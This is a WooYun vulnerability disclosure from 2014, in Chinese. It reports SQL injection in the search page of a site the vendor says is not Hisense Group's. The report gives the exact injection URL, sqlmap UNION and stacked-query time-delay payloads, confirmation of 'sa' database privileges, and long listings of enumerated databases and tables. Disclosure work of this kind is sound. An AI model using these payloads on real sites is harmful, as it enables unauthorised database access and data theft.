当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083074

漏洞标题:海信某站SQL注射(SA权限)

相关厂商:hisense.com

漏洞作者: Focusstart

提交时间:2014-11-13 11:42

修复时间:2014-11-13 12:56

公开时间:2014-11-13 12:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-13: 细节已通知厂商并且等待厂商处理中
2014-11-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

海信某站SQL注射(SA权限)

详细说明:

注射点:http://www.nj-hisense.com/company/zm/5/serch.asp?keywd=a&ft=news&userid=njhisense
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: keywd
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: keywd=a' UNION ALL SELECT 10, CHAR(58)+CHAR(97)+CHAR(114)+CHAR(119)+CHAR(58)+CHAR(71)+CHAR(102)+CHAR(121)+CHAR(76)+CHAR(75)+CHAR(81)+CHAR(70)+CHAR(79)+CHAR(71)+CHAR(110)+CHAR(58)+CHAR(120)+CHAR(108)+CHAR(102)+CHAR(58), 10-- &ft=news&userid=njhisense
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keywd=a'; WAITFOR DELAY '0:0:5';--&ft=news&userid=njhisense
---
current user: 'sa'

漏洞证明:

Database: aa
[20 tables]
+--------------------------------------------------+
| dbo.R_Member |
| dbo.R_MemberFriendClass |
| dbo.R_MemberMsg |
| dbo.R_MemberPower |
| dbo.R_Pic |
| dbo.R_Products |
| dbo.R_ProductsClass_e |
| dbo.R_ad_list |
| dbo.R_ad_type |
| dbo.R_appraise |
| dbo.R_company_e |
| dbo.R_favorite |
| dbo.R_zh |
| dbo.lanmu |
| dbo.lyxj |
| dbo.member_1 |
| dbo.sygg |
| dbo.utype |
| dbo.vip_icp |
| dbo.zixun_leaveword_lt |
+--------------------------------------------------+
Database: tempdb
[2 tables]
+--------------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: wyt
[20 tables]
+--------------------------------------------------+
| dbo.R_MemberMsg |
| dbo.R_MemberPower |
| dbo.R_N_class |
| dbo.R_News_Template |
| dbo.R_Pic |
| dbo.R_Products |
| dbo.R_ProductsBigClass |
| dbo.R_ProductsClass_e |
| dbo.R_ProductsMiddleClass |
| dbo.R_ProductsSmallClass |
| dbo.R_ad_list |
| dbo.R_ad_type |
| dbo.R_appraise |
| dbo.R_company_e |
| dbo.R_cype_1 |
| dbo.R_favorite |
| dbo.R_honor |
| dbo.R_info_ad |
| dbo.R_info_e |
| dbo.R_info_title |
+--------------------------------------------------+
Database: wc_bdsyw_admin
[20 tables]
+--------------------------------------------------+
| dbo.R_Member |
| dbo.R_MemberFriendClass |
| dbo.R_MemberMsg |
| dbo.R_MemberPower |
| dbo.R_ProductsClass_e |
| dbo.R_ad_list |
| dbo.R_ad_type |
| dbo.R_appraise |
| dbo.R_company_e |
| dbo.R_favorite |
| dbo.R_info_ad |
| dbo.R_info_e |
| dbo.R_keyword |
| dbo.R_wanyetong |
| dbo.R_zh |
| dbo.getpwd |
| dbo.setban |
| dbo.setbg |
| dbo.utype |
| dbo.zixun_leaveword |
+--------------------------------------------------+
Database: s1
[20 tables]
+--------------------------------------------------+
| dbo.Notepad |
| dbo.R_ad_list |
| dbo.R_ad_type |
| dbo.R_appraise |
| dbo.R_company_e |
| dbo.R_honor |
| dbo.R_info_title |
| dbo.R_news |
| dbo.jindianzi_email |
| dbo.lyb |
| dbo.mb |
| dbo.news_cpl |
| dbo.news_pl |
| dbo.pcid |
| dbo.pk_pl |
| dbo.pkinfo |
| dbo.qqlist |
| dbo.vip_title |
| dbo.yjhd |
| dbo.zixun_leaveword_lt |
+--------------------------------------------------+
Database: msdb
[20 tables]
+--------------------------------------------------+
| dbo.RTblDTSProps |
| dbo.RTblDatabaseVersion |
| dbo.RTblIfaceMem |
| dbo.RTblParameterDef |
| dbo.RTblVersionAdminInfo |
| dbo.RTblWorkspaceItems |
| dbo.backupfile |
| dbo.restorefile |
| dbo.restorefilegroup |
| dbo.restorehistory |
| dbo.sysalerts |
| dbo.syscategories |
| dbo.sysjobschedules |
| dbo.sysnotifications |
| dbo.sysoperators |
| dbo.systargetservergroupmembers |
| dbo.systargetservergroups |
| dbo.systargetservers |
| dbo.systargetservers_view |
| dbo.systaskids |
+--------------------------------------------------+
Database: pubs
[14 tables]
+--------------------------------------------------+
| dbo.authors |
| dbo.discounts |
| dbo.employee |
| dbo.jobs |
| dbo.pub_info |
| dbo.publishers |
| dbo.roysched |
| dbo.sales |
| dbo.stores |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.titleauthor |
| dbo.titles |
| dbo.titleview |
+--------------------------------------------------+
Database: en
[20 tables]
+--------------------------------------------------+
| dbo.j_job_class |
| dbo.lanmu |
| dbo.mb |
| dbo.r_company |
| dbo.r_config |
| dbo.r_honor |
| dbo.r_info |
| dbo.r_job |
| dbo.r_keyword |
| dbo.r_member |
| dbo.r_news |
| dbo.r_news_ad |
| dbo.r_news_template |
| dbo.r_newsclass |
| dbo.r_utype |
| dbo.r_wanyetong |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.yqlj |
| dbo.zixun_leaveword |
+--------------------------------------------------+
Database: master
[20 tables]
+--------------------------------------------------+
| dbo.[INFORMATION_SCHEMA.CHECK_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.COLUMNS] |
| dbo.[INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE] |
| dbo.[INFORMATION_SCHEMA.COLUMN_PRIVILEGES] |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE] |
| dbo.[INFORMATION_SCHEMA.DOMAINS] |
| dbo.[INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.KEY_COLUMN_USAGE] |
| dbo.[INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.SCHEMATA] |
| dbo.[INFORMATION_SCHEMA.TABLES] |
| dbo.[INFORMATION_SCHEMA.TABLE_CONSTRAINTS] |
| dbo.[INFORMATION_SCHEMA.TABLE_PRIVILEGES] |
| dbo.spt_fallback_db |
| dbo.spt_fallback_dev |
| dbo.spt_fallback_usg |
| dbo.spt_monitor |
| dbo.spt_provider_types |
| dbo.spt_values |
+--------------------------------------------------+
Database: model
[2 tables]
+--------------------------------------------------+
| dbo.sysconstraints |
| dbo.syssegments |
+--------------------------------------------------+
Database: Northwind
[20 tables]
+--------------------------------------------------+
| dbo.CustomerCustomerDemo |
| dbo.Invoices |
| dbo.Orders |
| dbo.Products |
| dbo.[Alphabetical list of products] |
| dbo.[Category Sales for 1997] |
| dbo.[Current Product List] |
| dbo.[Customer and Suppliers by City] |
| dbo.[Order Details Extended] |
| dbo.[Order Details] |
| dbo.[Order Subtotals] |
| dbo.[Orders Qry] |
| dbo.[Product Sales for 1997] |
| dbo.[Products Above Average Price] |
| dbo.[Products by Category] |
| dbo.[Quarterly Orders] |
| dbo.[Sales Totals by Amount] |
| dbo.[Sales by Category] |
| dbo.[Summary of Sales by Quarter] |
| dbo.[Summary of Sales by Year] |
+--------------------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 Focusstart@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-13 12:56

厂商回复:

此网站并非海信集团网站

最新状态:

暂无


漏洞评价:

评论